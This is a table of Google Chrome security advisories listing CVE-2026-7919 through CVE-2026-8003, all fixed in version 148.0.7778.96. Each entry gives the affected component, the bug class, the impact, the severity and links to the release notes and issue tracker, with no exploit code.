| Google--Chrome | Use after free in Aura in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7919 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498832921 |
| Google--Chrome | Use after free in Skia in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7920 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498989348 |
| Google--Chrome | Use after free in Passwords in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7921 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499062376 |
| Google--Chrome | Use after free in ServiceWorker in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7922 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499449324 |
| Google--Chrome | Out of bounds write in Skia in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7923 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500080194 |
| Google--Chrome | Uninitialized Use in Dawn in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7924 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500087204 |
| Google--Chrome | Use after free in Chromoting in Google Chrome on Windows prior to 148.0.7778.96 allowed a local attacker to perform OS-level privilege escalation via a malicious file. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7925 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501833981 |
| Google--Chrome | Use after free in PresentationAPI in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7926 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502249087 |
| Google--Chrome | Type Confusion in Runtime in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7927 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502830119 |
| Google--Chrome | Use after free in WebRTC in Google Chrome on Windows prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7928 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504612429 |
| Google--Chrome | Use after free in MediaRecording in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7929 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504660052 |
| Google--Chrome | Insufficient validation of untrusted input in Cookies in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to perform privilege escalation via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7930 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/434825208 |
| Google--Chrome | Insufficient validation of untrusted input in iOS in Google Chrome on iOS prior to 148.0.7778.96 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7931 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/474338157 |
| Google--Chrome | Insufficient policy enforcement in Downloads in Google Chrome prior to 148.0.7778.96 allowed a local attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7932 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/481634116 |
| Google--Chrome | Out of bounds read in WebCodecs in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to perform an out of bounds memory read via a crafted video file. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7933 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/488585490 |
| Google--Chrome | Insufficient validation of untrusted input in Popup Blocker in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7934 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/489023922 |
| Google--Chrome | Inappropriate implementation in Speech in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7935 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/489624550 |
| Google--Chrome | Object lifecycle issue in V8 in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7936 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/490485402 |
| Google--Chrome | Insufficient policy enforcement in DevTools in Google Chrome prior to 148.0.7778.96 allowed an attacker who convinced a user to install a malicious extension to bypass navigation restrictions via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7937 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/491766258 |
| Google--Chrome | Use after free in CSS in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7938 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/492735384 |
| Google--Chrome | Inappropriate implementation in SanitizerAPI in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7939 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/492963096 |
| Google--Chrome | Use after free in V8 in Google Chrome prior to 148.0.7778.96 allowed an attacker who convinced a user to install a malicious extension to execute arbitrary code inside a sandbox via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7940 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/493631402 |
| Google--Chrome | Insufficient validation of untrusted input in Mobile in Google Chrome on Android prior to 148.0.7778.96 allowed a local attacker to inject arbitrary scripts or HTML (UXSS) via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7941 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/493955234 |
| Google--Chrome | Integer overflow in ANGLE in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7942 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/495363705 |
| Google--Chrome | Insufficient validation of untrusted input in ANGLE in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to perform arbitrary read/write via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7943 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/495373657 |
| Google--Chrome | Insufficient validation of untrusted input in Persistent Cache in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7944 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/495783187 |
| Google--Chrome | Insufficient validation of untrusted input in COOP in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7945 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/495802788 |
| Google--Chrome | Insufficient policy enforcement in WebUI in Google Chrome on Linux, Mac, Windows, ChromeOS prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7946 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496016840 |
| Google--Chrome | Insufficient validation of untrusted input in Network in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7947 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496169594 |
| Google--Chrome | Race in Chromoting in Google Chrome on Windows prior to 148.0.7778.96 allowed a local attacker to perform privilege escalation via a malicious file. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7948 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496193452 |
| Google--Chrome | Out of bounds read in Skia in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7949 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496206134 |
| Google--Chrome | Out of bounds read and write in GFX in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to perform arbitrary read/write via malicious network traffic. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7950 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496259890 |
| Google--Chrome | Out of bounds write in WebRTC in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7951 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496266456 |
| Google--Chrome | Insufficient policy enforcement in Extensions in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to bypass discretionary access control via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7952 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496279876 |
| Google--Chrome | Insufficient validation of untrusted input in Omnibox in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via malicious network traffic. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7953 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496379792 |
| Google--Chrome | Race in Shared Storage in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7954 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496380960 |
| Google--Chrome | Uninitialized Use in GPU in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7955 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496441232 |
| Google--Chrome | Use after free in Navigation in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7956 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496463315 |
| Google--Chrome | Out of bounds write in Media in Google Chrome on Mac, iOS prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7957 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496607380 |
| Google--Chrome | Inappropriate implementation in ServiceWorker in Google Chrome prior to 148.0.7778.96 allowed an attacker who convinced a user to install a malicious extension to inject arbitrary scripts or HTML (UXSS) via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7958 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496632973 |
| Google--Chrome | Inappropriate implementation in Navigation in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7959 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496645205 |
| Google--Chrome | Race in Speech in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7960 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497007825 |
| Google--Chrome | Insufficient validation of untrusted input in Permissions in Google Chrome prior to 148.0.7778.96 allowed an attacker on the local network segment to leak cross-origin data via malicious network traffic. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7961 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497008295 |
| Google--Chrome | Insufficient policy enforcement in DirectSockets in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to perform arbitrary read/write via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7962 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497081987 |
| Google--Chrome | Inappropriate implementation in ServiceWorker in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7963 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497250399 |
| Google--Chrome | Insufficient validation of untrusted input in FileSystem in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to perform arbitrary read/write via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7964 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497254383 |
| Google--Chrome | Insufficient validation of untrusted input in DevTools in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7965 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497255035 |
| Google--Chrome | Insufficient validation of untrusted input in SiteIsolation in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7966 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497341787 |
| Google--Chrome | Insufficient validation of untrusted input in Navigation in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7967 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497365545 |
| Google--Chrome | Insufficient validation of untrusted input in CORS in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7968 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497432281 |
| Google--Chrome | Integer overflow in Network in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7969 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497450574 |
| Google--Chrome | Use after free in TopChrome in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7970 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497487462 |
| Google--Chrome | Inappropriate implementation in ORB in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7971 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497529290 |
| Google--Chrome | Uninitialized Use in GPU in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7972 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497546281 |
| Google--Chrome | Integer overflow in Dawn in Google Chrome on Windows prior to 148.0.7778.96 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7973 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497565944 |
| Google--Chrome | Use after free in Blink in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7974 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497649372 |
| Google--Chrome | Use after free in DevTools in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7975 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497735587 |
| Google--Chrome | Use after free in Views in Google Chrome prior to 148.0.7778.96 allowed an attacker who convinced a user to install a malicious extension to execute arbitrary code via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7976 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497736679 |
| Google--Chrome | Inappropriate implementation in Canvas in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7977 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497821223 |
| Google--Chrome | Inappropriate implementation in Companion in Google Chrome on Mac prior to 148.0.7778.96 allowed a remote attacker to perform OS-level privilege escalation via malicious network traffic. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7978 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497828892 |
| Google--Chrome | Inappropriate implementation in Media in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7979 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497849876 |
| Google--Chrome | Use after free in WebAudio in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7980 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497859275 |
| Google--Chrome | Out of bounds read in Codecs in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to obtain potentially sensitive information from process memory via a malicious file. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7981 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497926602 |
| Google--Chrome | Uninitialized Use in WebCodecs in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7982 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497952533 |
| Google--Chrome | Out of bounds read in Dawn in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7983 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497975608 |
| Google--Chrome | Use after free in ReadingMode in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7984 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498277368 |
| Google--Chrome | Use after free in GPU in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7985 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498352423 |
| Google--Chrome | Insufficient policy enforcement in Autofill in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7986 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498396238 |
| Google--Chrome | Use after free in WebRTC in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7987 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498696266 |
| Google--Chrome | Type Confusion in WebRTC in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7988 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498753456 |
| Google--Chrome | Insufficient data validation in DataTransfer in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to perform arbitrary read/write via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7989 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498765082 |
| Google--Chrome | Insufficient validation of untrusted input in Updater in Google Chrome on Windows prior to 148.0.7778.96 allowed a local attacker to perform OS-level privilege escalation via a malicious file. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7990 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498892267 |
| Google--Chrome | Use after free in UI in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7991 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499065126 |
| Google--Chrome | Insufficient validation of untrusted input in UI in Google Chrome on Linux, ChromeOS prior to 148.0.7778.96 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7992 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499067529 |
| Google--Chrome | Insufficient validation of untrusted input in Payments in Google Chrome on Android prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7993 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499099003 |
| Google--Chrome | Inappropriate implementation in Chromoting in Google Chrome on Windows prior to 148.0.7778.96 allowed a local attacker to perform OS-level privilege escalation via a malicious file. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7994 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499116954 |
| Google--Chrome | Out of bounds read in AdFilter in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7995 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501745798 |
| Google--Chrome | Insufficient validation of untrusted input in SSL in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-7996 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/484547631 |
| Google--Chrome | Insufficient validation of untrusted input in Updater in Google Chrome on Mac prior to 148.0.7778.96 allowed a local attacker to perform OS-level privilege escalation via a malicious file. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-7997 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/487960705 |
| Google--Chrome | Insufficient validation of untrusted input in Dialog in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-7998 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/491676472 |
| Google--Chrome | Inappropriate implementation in V8 in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-7999 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/493099941 |
| Google--Chrome | Insufficient validation of untrusted input in ChromeDriver in Google Chrome on Windows prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8000 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/494464734 |
| Google--Chrome | Use After Free in Printing in Google Chrome on Linux, Mac, ChromeOS prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8001 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/494764371 |
| Google--Chrome | Use after free in Audio in Google Chrome on Mac prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8002 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/495779613 |
| Google--Chrome | Insufficient validation of untrusted input in TabGroups in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to perform UI spoofing via malicious network traffic. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8003 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/495985532 |
